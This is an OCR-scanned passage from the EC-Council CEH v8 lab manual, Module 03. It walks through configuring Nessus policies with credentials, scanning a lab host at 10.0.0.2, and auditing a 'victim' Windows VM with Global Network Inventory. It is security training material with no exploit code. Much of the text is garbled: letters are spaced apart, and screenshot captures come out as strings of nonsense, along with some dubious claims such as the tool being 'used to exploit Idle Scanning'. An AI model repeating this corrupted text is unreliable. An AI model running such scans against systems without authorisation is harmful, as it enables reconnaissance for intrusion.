M o d u le 0 3 - S c a n n in g N e tw o rk s

F
P l u g in Feed R e g is t r a t io n

" • ‫ ״‬- ,®[‫ ן‬Wekcm* 10 Meuvt 9

As• information about new vulnerabilities 1 8 discovered and released into the public domain, Tenabte's research staff designs programs ("plugins”) that enable Nessus to detect their presence. The plugins contain vulnerability Information, the algorithm to test for the presence of the security Issue, and a set of remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed*. You can do so by voting http 7/www.nessus.orQyreolster/ to obtain an Activation Code.

IbsdJ Once the plugins liave been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start

• To use Nessus at your workplace, pufdiaae a commetG d Prgfcaatonalfccd • To um NcMuti at In a non ■commercial homo environment, you can get HomeFeed (or free • Tenable SecurltvCentor usore: Enter 'SoairltyCenter* In the field below • To perform offline plugin updates, enter 'offline' In the field below

11

Activation Code Please enter your Activation Code:|9061-0266-9046-S6E4-l8£4| x|

Optional Proxy Settings < Prev Next >

FIGURE 10.18: Nessus Applying Activation Code 2 5 . T h e Registering w i n d o w a p p e a r s a s s h o w n i n d i e f o l l o w i n g s c r e e n s h o t .
C * fx Bs~** ■ d *-ho* P • 0 Cc**uttemH SC J w efc< • * ‫<׳‬to m ft * o 1

R e g is t e r in g . . . Registering the scanner with Tenable...

FIGURE 10.19: Nessus Registering Activation Code 2 6 . A f t e r s u c c e s s f u l r e g i s t r a t i o n c li c k , Next: Download plugins > t o d o w n lo a d N e s s u s p lu g in s .

m Nessus server configuration is managed via the GUI Tlie nessusdeonf file is deprecated In addition, prosy settings, subscription feed registration, and offline updates are managed via the GUI

P • OC e*rt< *e««o« & C | ‫[ן‬x a =f

W etconetoN e s s u s

■ ‫־ ־‬

‫׳ ־‬* ‫יי‬ ft * o

R e g is t e r in g . . . Successfully registered the scanner with Tenable. Successfully created the user. | Next: Download plug!mi > |

FIGURE 10.20: Nessus Downloading Plugins 2 7 . N e s s u s w ill s t a r t f e t c h i n g t h e p l u g i n s a n d i t w ill i n s t a l l t h e m , i t w ill t a k e tim e to in s ta ll p lu g in s a n d in itia liz a tio n

N e s s u s is f e t c h in g t h e n e w e s t p lu g in s e t
P le a a e w a it...

FIGURE 10.21: Nessus fetching the newest plugin set 2 8 . H i e Nessus Log In p a g e a p p e a r s . E n t e r t h e Usernam e a n d Passw ord g i v e n a t t h e t i m e o f r e g i s t r a t i o n a n d c li c k Log In.

C EH Lab Manual Page 179

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

•TASK

2

/ > .0

tc

Network Scan Vulnerabilities

nessus
I «•«‫״‬

‫׳‬ L

T E N A »L g

i

Q For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.

FIGURE 10.22: The Nessus Log In screen 2 9 . T h e Nessus Hom eFeed w i n d o w a p p e a r s . C li c k OK.

,1

/

/ /

1

n essu s
w l oaiiUtanter any oust fton* oroigMtaAofii M• to a PTOtoMknalFMd Subecrtpfcxi h a< •

inn r m m i v a u u r a h m k M to llm id TBtH il lr» nanatamO » M M to MMWuNMy i M W M u w may load 10(*iMoaAon J m i u h (eepenew.

190* -?0121)nM1 N M M s*.o r*/ nc

OK

I

FIGURE 10.23: Nessus HomeFeed subscription 3 0 . A f t e r y o u s u c c e s s f u l l y l o g i n , t h e Nessus Daemon w i n d o w a p p e a r s a s To add a new policy, dick Policies ‫ ^־־‬Add Policy.

m

s h o w n in th e fo llo w in g s c r e e n s h o t.

FIGURE 10.24: The Nessus main screen 3 1 . I f y o u h a v e a n Adm inistrator Role, y o u c a n s e e d i e U sers t a b , w h i c h li s t s a ll Users, t h e i r Roles, a n d t h e i r Last Logins.

C EH Lab Manual Page 180

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

New policies are configured using tlie Credentials tab.

FIGURE 10.25: The Nessus administrator view 3 2 . T o a d d a n e w p o li c y , c li c k Po licie s ‫ >־‬Add Policy. F il l i n t h e General p o l i c y s e c t i o n s , n a m e l y , B asic, Sca n , Network Congestion, Port

Scanners, Port Sca n Options, a n d Performance.

^WARNING: Any changes to the Nessus scanner configuration will affect ALL Nessus users. Edit these options carefully

FIGURE 10.26: Adding Policies 3 3 . T o c o n f i g u r e d i e c r e d e n t i a l s o f n e w p o l i c y , c li c k d i e Credentials t a b s h o w n i n t h e l e f t p a n e o f Add Policy.

C EH Lab Manual Page 181

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

m The most effective credentials scans are those for which the supplied credentials have root privileges.

FIGURE 10.27: Adding Policies and setting Credentials 3 4 . T o s e l e c t t h e r e q u i r e d p l u g i n s , c li c k t h e Plugins t a b i n t h e l e f t p a n e o f

Add Policy.
P • . ‫״ ״ »׳‬

m If you are using Kerberos, you must configure a Nessus scanner to authenticate a KDC.

WO W B lc/O tr!« c» U rir ^ r» u«!j S u it#1 «o!v.b O anottK dfenw ct, (a) 0 « n eral V jG en lT O U K B lS * aj‫*׳‬ y C h K * » y m p -u xL 0 C a Seaiftyc‫׳‬k»i Jurat UjcUS acu n tyC h K M 3w opn» T rie*m att tc*

18 W 8 eo?1 A xaunt 0 +m *‫*י‬7 O ‫יינייי‬ ‫ ין‬..‫• וי‬O C U kttO 'ta•• -J’U rK lnl I o iiiiiI ii« > > u I I.< W
O A « « r« lfc**‫ ״‬ftM ■*2m* L *»r>* >IknU. o 1 ‫ עטי‬B aiH ir r>K M 1Su‫־‬orPar20AO.W eilm iinftw aia O 16 T OCCHO P 1 W )0 1M elo n O1 4 M 0C *1 tar«K T T PPra! S if* ! H cd Hattr R urolaD o S <J 1 2 0 M CtcdPowF .irV V a l 4■, 1 ‫ו‬. uaeV jInentollB|0f.F S |

f* » 1C ikre T C Ppoll*22 1W O . ‫ז‬75‫*ד‬ * * ‫יי‬ ffj»w yU e ly B ia lK W 5 isAOioai*scrtr sc * < * * n c e pars T C P .E 2 2 1 ‫מ>׳»!יא‬1 ‫ ני‬W v * ‫׳‬.v.e‫־‬C T .17* MtiKtAwklinsj‫ ׳‬T C P .'1 7 8 14 ‫*יז‬ ‫־‬.‫*ו‬ ‫)ייי‬tcfirttxnUxlum g

FIGURE 10.28: Adding Policies and selecting Plugins 3 5 . T o c o n f i g u r e p r e f e r e n c e s , c li c k t h e Preferen ces t a b i n t h e l e f t p a n e o f

Add Policy.
3 6 . I n t h e Plugin f ie ld , s e l e c t Database settings f r o m t h e d r o p - d o w n lis t. If the policy is successfully added, then the 3 7 . E n t e r t h e Login d e t a i l s g i v e n a t d i e t i m e o f r e g i s t r a t i o n . Nessus server displays the massage 3 8 . G i v e t h e D a t a b a s e S I D : 4587, D a t a b a s e p o r t t o u s e : 124, a n d s e l e c t

a

O r a c l e a u t l i ty p e : SY SD BA . 3 9 . C li c k Submit.

C EH Lab Manual Page 182

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

CD Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 03 Scanning Networks

FIGURE 10.29: Adding Policies and setting Preferences 4 0 . A m e s s a g e Po licy “ N etw o rk Scan _Po licy‫ ״‬w as successfu lly added d is p la y s a s s h o w n a s f o l l o w s .

FIGURE 10.30: The NetworkScan Policy To scan the window, input the field name, type, policy, scan target, and target file. ‘ 4 1 . N o w , c li c k Sca n s ‫ >־‬Add t o o p e n t h e Add Sca n w i n d o w . 4 2 . I n p u t t h e f i e ld Name, Type, Policy, a n d S ca n Target 4 3 . 111 S ca n Targets, e n t e r d i e I P a d d r e s s o f y o u r n e t w o r k ; h e r e i n t h i s l a b w e a r e s c a n n i n g 1 0 .0 .0 .2 . 4 4 . C li c k Launch S ca n a t d i e b o t t o m - r i g h t o f t h e w i n d o w .

Note: T h e I P a d d r e s s e s m a y d i f f e r i n y o u r l a b e n v i r o n m e n t

C EH Lab Manual Page 183

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11

M o d u le 0 3 - S c a n n in g N e tw o rk s

Nessus lias the ability to save configured scan policies, network targets, and reports as a .nessus file.

FIGURE 10.31: Add Scan 4 5 . T h e s c a n l a u n c h e s a n d starts scanning t h e n e t w o r k .

FIGURE 10.32: Scanning in progress

S ' Tools demonstrated in this lab are available in D:\CEH• Tools\CEHv8 Module 03 Scanning Networks

4 6 . A f t e r t h e s c a n is c o m p l e t e , c li c k t h e Reports ta b .

FIGURE 10.33: Nessus Reports tab 4 7 . D o u b l e - c l i c k Local Network t o v i e w t h e d e t a i l e d s c a n r e p o r t .

fc

^

■d

‫י‬ ..-*—

gMtyi

Bn■ B m tn

< Cvwii

'

So-Mity

‫—« ״‬ Hm n t ■w1 1■ 1I K IN W I

‫״׳•*־׳‬ •M m Me

Z
• ‫■׳‬ ‫נ־י‬ ‫< ז*ו‬ • < HM HM tMM H9W •xfn H lrrt> Iftte Infe £[ l« v >

MUl-a* • *«—■ ».»» * «Qi

C«uMUrm tlmb«n rf

UTMMB1 W . i■ ■ — 1

•MM•

KTT* Im i T> »•M VIWMH N « M < N ilr a W U IIM t W M « l

Wt W M W lK M l

M .»~« •Tnl *m

NHHl^«ll>H|«i iW .I»

UhmlUn C M * * • WiMom w m m uv* no^jMren Un» C«M

McmcC o 1o -*« it f i LMdicr^ntarnjlutPu < » Funtut SID Ewneutan M m x M tC o t n m k U u iu im L ‫׳‬i 1»«-cruttn hgr r J• O aH K Qn-a• U r . riCK) SnaUU-

1 0 1
U B •MO.

FIGURE 10.34: Report of the scanned target

C EH Lab Manual Page 184

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

4 8 . D o u b l e - c l i c k a n y result t o d i s p l a y a m o r e d e t a i l e d s y n o p s i s , d e s c r i p t i o n , s e c u r ity le v e l, a n d s o lu tio n .

Q If you are manually creating "nessusrc" files, there are several parameters that can be configured to specify SSH authentications.

FIGURE 10.35: Report of a scanned target 4 9 . C l i c k t h e Download Report b u t t o n i n t h e l e f t p a n e . 5 0 . Y o u c a n d o w n l o a d a v a il a b le r e p o r t s w i t h a .nessus e x t e n s i o n f r o m t h e d r o p - d o w n lis t. Download R eport Download Format 1 Chapters
C hap ter Selectio n N ot A llow ed

X

G 3 To stop Nessus server, go to the Nessus Server Manager and click Stop Nessus Server button. Cancel FIGURE 10.36: Download Report with .nessus extension 5 1 . N o w , c li c k Log out. 5 2 . 111 t h e N e s s u s S e r v e r M a n a g e r , c li c k Stop Nessus Server. Subm it

B ‫■׳־׳‬
>M

P ■

*6

a
FIGURE 10.37: Log out Nessus

■69■
L a b A n a ly s is
D o c u m e n t all d i e r e s u lts a n d r e p o r t s g a d i e r e d d u r i n g d i e la b .

C EH Lab Manual Page 185

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

T o o l/U tility

I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d S c a n T a rg e t M a c h in e : L o cal H o st

Perfo rm ed Scan P o lic y : N e t w o r k S c a n P o l i c y N e ssu s T arg et I P Address: 1 0 .0 .0 .2 R esult: L o c a l H o s t v u l n e r a b i l i t i e s

PL E A S E TALK T O Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

Q u e s t io n s
1. E v a lu a te th e O S p la tfo rm s th a t N e s s u s h a s b u ild s fo r. E v a lu a te w h e th e r N e s s u s w o r k s w ith th e s e c u r ity c e n te r. 2. D e te r m in e h o w th e N e s s u s lic e n s e w o r k s in a V M (V ir tu a l M a c h in e ) e n v iro n m e n t.

In te rn e t C o n n e c tio n R e q u ire d

0 \ es
Pla tfo rm Supported 0 C lassroom

No

iL a b s

C EH Lab Manual Page 186

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

I CON K E Y aValuable information Test your knowledge Web exercise

Auditing Scanning by using Global Network Inventory
Global]Seh)• o r kInventoryis u s e dasanauditscannerin ~ e r od e p lo y m e n tand a g e n t f r e ee n v ir o n m e n ts . It s c a n sco n rp !ite rsb yIP r a n g e ,d o m a in ,c o n / p !ite r sorsin g le c o m p u t e r s ,d e fin e db yth e GlobalNetirork Inventory h o stfile.
L a b S c e n a r io
W ith th e d e v e lo p m e n t o f n e tw o rk te c h n o lo g ie s and a p p lic a tio n s , n e tw o r k
01

s

m W orkbook review

a t t a c k s a r e g r e a t l y i n c r e a s i n g b o t h i n n u m b e r a n d s e v e r ity . A t t a c k e r s a lw a y s l o o k f o r service v u l n e r a b i l i t i e s a n d

application v u l n e r a b i l i t i e s o n a n e t w o r k

s e r v e r s . I f a n a t t a c k e r f i n d s a f la w o r l o o p h o l e i n a s e r v i c e r u n o v e r t h e I n t e r n e t , t h e a t t a c k e r w ill i m m e d i a t e l y u s e t h a t t o c o m p r o m i s e t h e e n t i r e s y s t e m a n d o th e r d a ta fo u n d , th u s he or she can c o m p ro m is e o th e r s y s te m s
0 11

th e

n e t w o r k . S im ila r ly , i f t h e

a tta c k e r fin d s

a w o rk s ta tio n w ith

adm inistrative

privileges w i t h f a u l t s i n t h a t w o r k s t a t i o n ’s a p p l i c a t i o n s , t h e y c a n e x e c u t e a n
a rb itr a r y c o d e 0 1 im p la n t v iru s e s to in te n s ify th e d a m a g e to th e n e tw o rk . A s a k e y te c h n iq u e in n e tw o r k s e c u r ity d o m a in , in t r u s i o n d e te c tio n s y s te m s (ID S e s ) p la y a v ita l r o le o f d e te c tin g v a r io u s k in d s o f a tta c k s a n d s e c u r e th e n e t w o r k s . S o , a s a n a d m i n i s t r a t o r y o u s h o u l d m a k e s u r e t h a t s e r v ic e s d o n o t r u n a s t h e root user, a n d s h o u l d b e c a u t i o u s o f p a t c h e s a n d u p d a t e s f o r a p p l i c a t i o n s f r o m v e n d o r s 0 1 s e c u r i t y o r g a n i z a t i o n s s u c h a s C ER T a n d CVE. S a f e g u a r d s c a n b e im p le m e n te d s o t h a t e m a il c lie n t s o f tw a re d o e s n o t a u to m a tic a lly o p e n o r e x e c u t e a t t a c h m e n t s . 1 1 1 t h i s l a b , y o u w ill l e a r n h o w n e t w o r k s a r e s c a n n e d u s i n g th e G lo b a l N e t w o r k I n v e n t o r y to o l.

L a b O b j e c t iv e s
T h i s l a b w ill s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w t o u s e G l o b a l N e t w o r k I n v e n t o r y . I t w ill t e a c h v o u h o w to : U s e th e G lo b a l N e tw o r k I n v e n to r y to o l

C EH Lab Manual Page 187

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t
ZZ‫ ל‬Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 03 Scanning Networks
T o c a n y o u t d ie la b , y o u n e e d : ■ G l o b a l N e t w o r k I n v e n t o r y t o o l l o c a t e d a t D:\CEH-Tools\CEHv8 Module

03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner
■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f G l o b a l N e t w o r k I n v e n t o r y f r o m th is lin k h t t p : / /w w w .m a g n e to s o f t.c o m /p r o d u c ts /g lo b a l n e tw o rk in v e n to r y /g n i f e a tu re s .h tm / ■ I f y o u d e c i d e t o d o w n l o a d t h e l a t e s t v e r s i o n , t h e n screenshots s h o w n in th e la b m ig h t d iffe r ■ ■ A c o m p u t e r r u n n i n g Windows Server 2012 a s a tt a c k e r ( h o s t m a c h i n e ) A n o t h e r c o m p u t e r r u n n i n g Window Server 2008 a s v ic t im (v irtu a l m a c h in e ) ■ ■ A w e b b ro w s e r w ith I n te r n e t acc e ss F o l l o w d i e w iz a r d - d r iv e n in s ta l la t io n s te p s t o in s ta ll Global Network

Inventory
■ A d m in i s t r a ti v e p r iv ile g e s t o r u n to o l s

L a b D u r a t io n
T im e : 2 0 M i n u te s

O v e r v ie w o f G lo b a l N e t w o r k In v e n t o r y
G l o b a l N e t w o r k I n v e n t o r y is o n e o f d i e de facto to o l s f o r security auditing a n d

testing o f fire w a lls a n d n e tw o r k s , i t is a ls o u s e d t o e x p lo i t Idle Scanning.

Lab T asks
task

1
1. L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t c o rn e r o f d ie d e s k to p .

Scanning the network

FIGURE 11.1: Windows Server 2012 - Desktop view 2. C lic k d i e Global Network Inventory a p p t o o p e n d i e Global Network

Inventory w in d o w .

C EH Lab Manual Page 188

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

5 t 9 |‫־׳‬£

Administrator

Server Manager

Windows PcrwerShell

Google Chrome

Hn>er.V Manager

fL *J

m
Control Panel

*
Hypr-V Wtual Machine.

‫וי‬
SQLServs

Scan computers by IP range, by domain, single computers, or computers, defined by the Global Network Inventory host file

■ F
Command Prompt Mozfla £ 1 1 * 1 0 *

*

Mww&plcm

£

B
S- Bui Search01.. Global Nec»ort

PutBap

©

H
FIGURE 112: Windows Server 2012 - Apps

3.

T l i e Global Network Inventory M a i n w i n d o w a p p e a r s a s s h o w n i n d ie fo llo w in g fig u re .

4.

T h e Tip of Day w i n d o w a ls o a p p e a r s ; c lic k Close.

& S c a n only items that you need by customizing scan elements

FIGURE 11.3 Global Network Inventory Maui Window 5. T u r n 0 1 1 Windows Server 2008 v ir tu a l m a c h i n e f r o m H v p e r - V M a n a g e r .

C EH Lab Manual Page 189

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

□ Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices

FIGURE 11.4: Windows 2008 Virtual Machine 6. N o w s w it c h b a c k t o W i n d o w s S e r v e r 2 0 1 2 m a c h i n e , a n d a n e w A u d i t W i z a r d w i n d o w w ill a p p e a r . C lic k Next ( o r i n d i e t o o l b a r s e le c t Scan ta b a n d c lic k Launch audit wizard).

New Audit Wizard Welcome to the New Audit Wizard
T h s wizard will guide you through the process of creating a n ew inventory audit.

VIEWS SCAN RE S UL TS , /N CL UD/ NC HISTORIC RE S UL TS FOR ALL SCANS, INDIVIDUAL M ACHINES, O K SELECTED NUMBER O F ADDRESSES

To continue, click Next.

c Back

Next >

Cancel

FIGURE 11.5: Global Network Inventory new audit wizard 7. S e le c t IP range s c a n a n d t h e n c lic k Next i n d i e Audit Scan Mode w iz a r d .

C EH Lab Manual Page 190

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

New Audit Wizard
A u d it S c a n M o d e To start a new audfc scan you must choose the scenario that best fits how you w i be using this scan. Is ■ (^

M

O Single address scan Choose this mode

Q Fully customizable layouts and color schemes on all views and reports

i you want to audit a single computer i you want to audit a group of computers wttwn a sr>gle IP range i you want to audit computers that are part of the same doma»1(s)

(•) IP range scan Choose this mode O Domain scan Choose this mode 0

Host file scan Choose this mode to a u d t computers specified in the host file The most common scenario is to a u d t a group of computers without auditing an IP range or a domain

O Export audit agent Choose this mode you want to audit computers using a domain login script. An audit agent vwi be exported to a shared directory. It can later be used in the domain loain scnoi.

i

To continue, c ic k Next.

1 ______

< Back

N®d>

Cancel

FIGURE 11.6: Global Network Inventory Audit Scan Mode 8. Export data to HTML, XML, Microsoft Excel, and text formats S e t a il IP range s c a n a n d t h e n c lic k Next in d ie IP Range Scan w iz a r d .

Licenses are networkbased rather than userbased. In addition, extra licenses to cover additional addresses can be purchased at any time if required

9.

111 d i e Authentication Settings w iz a r d , s e le c t Connect as a n d fill t h e r e s p e c t e d c r e d e n tia ls o f y o u r Windows Server 2008 Virtual Machine, a n d c lic k Next.

C EH Lab Manual Page 191

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

New Audit Wizard
Authentication Settings

£□ The program comes with dozens of customizable reports. New reports can be easily added through the user interface

Specify the authentication settings to use to connect to a remote computer

OConnect as cxrrertiy logged on user
( • ) Connect as Domain \ User name Password a d ^ iriS '3 (-‫•׳‬

...........'

To continue, dck Next

<Back

Nert >

Caned

FIGURE 11.8 Global Network Inventory Authentication settings 10. L iv e d i e s e ttin g s a s d e f a u l t a n d c lic k Finish t o c o m p l e t e d i e w iz a r d . New Audit Wizard
Completing th e N ew Audit Wizard

( — 7Ability to generate reports on schedule after every scan, daily, weekly, or monthly

You are ready to start a new IP range scan You can set the following options for this scan:

@ Do not record unavailable nodes
@ Open scan progress dialog when scan starts Rescan nodes that have been su ccessfJy scanned Rescan, but no more than once a day

(§₪ T o configure reports choose Reports | Configure reports from the main menu and select a report from a tree control on a left. Each report can be configured independently

To complete this wizard, d ic k Finish.

<Back

finah

Cancel

FIGURE 11.9: Global Network Inventory final Audit wizard 11. I t d is p la y s d i e Scanning progress i n d i e Scan progress w in d o w .

C EH Lab Manual Page 192

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

iJ
‫מ‬ 0 1 2 3 4 5 6 7 8 9 10 ‫וו‬ ‫ו‬2 Address 10.0.0.2 10.0.0.3 10.0.0.4 ‫ ו‬0.0.0.5 ‫ ו‬0.0 06 10.0.0.7 10.0.08 10.009 100010 100011 10.0.0.12 100013 10.0.014

Scan progress
Name

Percent
E ! %

E*
W1N-ULY858KHQIP AOMINPC WIN-039MR5HL9E4
! z ^ z z _ W 852

E !*
92*4 92* | |

Q Filtering is a quick way to find a subset of data within a dataset. A filtered gnd displays only the nodes that meet the criteria you specified for a column(s)

' '

I

E* E* E* E*

1 A Tmestamp 06/22/1215 38:3 08/22/1215:36:23 08/22/1215:36:25 08/22/1215:36:23 = 06/22/1215:36:23 06/22/1215:36:22 08/22/1215:36:23 08/22/1215:36 24 06/22/1215:36 24 08/22/1215:36:24 08/22/1215:36:24 08/22/1215:36:24 06/22/1215:36:24
rtn m‫ר‬

@ Open this dialog sdien scan starts @ Close this dialog when scan completes @ D o n l display completed scans

Elapsed time: 0 min 6 sec Scanned nodes: 0 /24

. S l0 p

_ C l°”

1 /

FIGURE 11.10: Global Network Inventory Scanning Progress 12. A f t e r c o m p l e t i o n , scanning results c a n b e v ie w e d a s s h o w n i n t h e f o llo w in g fig u re .

Pi'v fie

Globa' Network Inventory - Unregistered
Stan Tools Reports H elp

V ie w

□]E

r

BlBW talri~»EI] u *‫? י‬

Niirt - MpIa ■addresses
$ ‫ ־‬WORKGROUP

NotBlOS |A S h anes Carr^ie♦ s>«en Q PiocMMn ^ ‫רס‬ » ‫ז‬H o t f t x e t |A)* t a t » S y t t e r n ] rcmnaon mrrr .: . ‫־‬ ‫ ז‬Ne t w o r t
Scar M W i ^ (^p#rat:r.r

a

JW l i t e rg r tn ; Man beard Q

^ 5‫׳‬ 1 ‫׳‬ \ Logged or Memory mu Memorydeuces ‫ך‬ : > H Detflcp

|Q

g

!•rwit

:■I 10.0JX7 (W IN-D39... ■m 1a0JX‫־‬ «(W 1N -U LV 8...
‫ ־י‬HoalN... ▼J Status d Doran WORKGROUP [COUNT-2) IP A dd © « : ‘ 0.0 0.4 (C0UNT-11

|T ir c it a m p
‫ ־י‬MAC A.. Verrfa ' 03 Mams ‫־‬ » FtoccJia ... *‫ ־‬Coimtert‫״־‬

T n «to ro :& 2 2 /2 0 1 2 3 36:49PM (COUNT-1)

0 Global Network Inventory lets you change grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column

‫ »■־‬C o ro j.. |v/N LLV05(| Succcii JIP A dde « .1 0 .a 0 .7 |C O U N T 1 ‫| ־‬

|C0-15 5DQ01 Micro:)*Ca V irccw ; Server |

1Trrcj »a36. 30 3 2012‫ ״‬3 . &‫׳‬22> ‫ ׳‬PM (C0UNT «1] •» C«‫־‬K>j..[v/N€3SMn|Succ0M |D4‫־‬ BE‫־‬D3‫־‬ C'|R«rtek |lnts(Rl Co!e(fM' Serial; H2D2<

Tow ?Henr(t)

[

r

1
O isp la ye^ ro iJp ^ J^ ro u p s

R tJu ltJfT iito ry d e p t^ L iJtu a rio rta c h a M re ^ s

FIGURE 11.11: Global Network Inventory result window 13. N o w s e le c t Windows Server 2008 m a c h i n e f r o m v ie w r e s u lts t o v ie w in d iv id u a l re s u lts .

C EH Lab Manual Page 193

Ethical Hacking and Countermeasures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Global Network Inventory ‫ ־‬Uniegislered
Me view scan Tool( Report < Help

l - l ° W *

in

-

% u 1 1 0 |s^ P ig ¥ B|Q|^|a|D|B-B # ® ,
■ '‫י‬-‫מ‬ ‫־‬Loocad!s\s^ Port a rre d o R ^ j| Orvces Scan •unrary 3 Computer yysten | Q System dots NetBIOS | ^ Z»: ‫ ־‬-‫ל•־‬:* B ' ‫ ״‬tens■ £ ‫־‬ Netr*of. adapter: |3 ‫׳‬ ■ Startup Lbcre B8 K3 |J ■ Desktoo Logged cr ^ Morer)

t* ss 3 □ 8
N*rrc B ‫ י^יי‬AH addresses B- <* WORKGROUP

^

|^

Hot fxes Shores '•';‫ ־׳י‬bosd

3e;jr** •certer L » ^cvps ^

*rfcT1DC.07tV/1N-D^Tn
»• ‘‫ מ‬C J 4 ‘fw¥-ULY3‫‘״‬

§ ,

Po ;c 3:cn> 0 :.:‫־‬ ,:tn3 '‫ ׳‬.:ten

,ft

& * Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from main menu and changing colors

Type

‫״‬

HoitN

» SMtu:

‫י‬

MAC A

* Vanda

» C JS

*

Proceisci

wCornu w r »

J Duiein * ‫׳‬o ^ e n a j p COUNT-11 JIPA ddrew 10XL0.7 (COUNT =1‫ן‬ TncU aro: G/22/2012 3:36:38 PM (COUNT-1) ■» C5T0J. jV/N 039MR Succe« |D4‫־‬BE D 9 C |R cakk ntsfR] Corc(TM' Send: H202!

R e » d y

^esufc^jto^jegt^oj^ca^o^oc^cdfcj^

FIGURE 11.12 Global Network Inventory Individual machine results 14. T h e Scan Summary s e c t io n g iv e s y o u a b r i e f s u m m a r y o f d i e m a c h i n e s t h a t have been scan n ed

Global Network Inventory ‫ ־‬Unregistered
fie VHvr Scan Tools Reports Melo

1- ‫־‬ ^ r

*5 ' n

□ ]e t 1
▼ a x

1^-sa
‫ נכ‬k Mcritofj |{jjjj ( j Q [# J NoifcKJS y w cto i S^eton dot• |^ ^ :■ ^ :• ;o re

aw ^ C X > k&tszi Q mo "Sntcn ^ :.,‫•׳‬ ;!= ■ ‫־‬ !Q | j* J Networx oocpteo Startup |H Dcck!op LoggoCon^ *5 Hoi focce Sharoe MantcsrdJ Socuty ccrto■ U w group( U*«ra

1 *a □ *
S ‫״‬f

a
Sn uperatmg

Logical dska

N am •
- ‫ !■ י‬A 1addrestM

Dovcoi

-: Tp-M<tyrte-r

‫י *י‬ ^ervces

WORKGROUP

^ lj1 C M 7 ^ iN D ^.‫־‬.‫־‬l

® ]^ jan rm y Scanl#||

p

! = ■ ‫־‬ »|

:■I lOiXOi’^N-ULYC"

‫ ם‬To configure results history level choose Scan | Results history level from the main menu and set the desired history level

Hcs4 H.. - Status
d t ' o m a r : \ v t R r . i i - O U ‫ ׳ ־‬l .‫־‬JLrJ ^ -‫־‬

‫ ־״‬MAC A... ‫ ■״־‬barrio-

~

O S K s rw

‫ ־י‬Prco3350r.. ‫ ״י‬Corrmert■‫״‬

P 3 d * e « : IC .0 .0 : CQUNT=1J _____________________________ Id Tn rg ra « p B /2 2 ;2 P lZ 3 -3 6 ^ P M [ C D U H r = l l

| ;*» Ccnpu |WM-039VIR|S1jrowt

rU-BF-D »C :|R^rri

lrvel(R)Core(TM; Seiial H?‫?ר‬

Total 4 ‫ו‬em(s)

1 ‫־‬
^c^lt^iiitorydepthj

r

1 ‫־‬

r

FIGURE 11.13: Global Inventory Scan Summary tab 15. T h e Bios s e c t i o n g iv e s d e ta ils o f B io s s e ttin g s .

C EH Lab Manual Page 194

Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Global Network Inventory ‫ ־‬Unregistered
fit view 5tan Tools Report( Help

1 ‫' ־‬°' x ‫ז‬

1 ^‫־ ז‬
icwresufts
* 89 £ □ J5 N a rrc H * P A ll addresses B 5 ‫ ־‬W ORKG RO UP

5• ‫״‬El SJ1'’‫־‬ □E T ? |5|□ ! H i ] H
‫׳ייי‬ X ^ ‫־ד‬ ^
_

&, t o
‫״‬ . ■ rrq .7 : 3" ■ > Startup |^ f,7. . • ■ Desktop Lccocd or Hct fixes Shares ^ Srcurti‫ ־‬ca te r jscr j a n Mar :>c*od Q )£• Mcrcry fc l 1555 >*‫י‬ Memory devices ‫ יי‬rent

k. Por. -annccfcrc Derive* 2 Q System dots MdBIOS P
S c ai aum anr

J. Pocessots

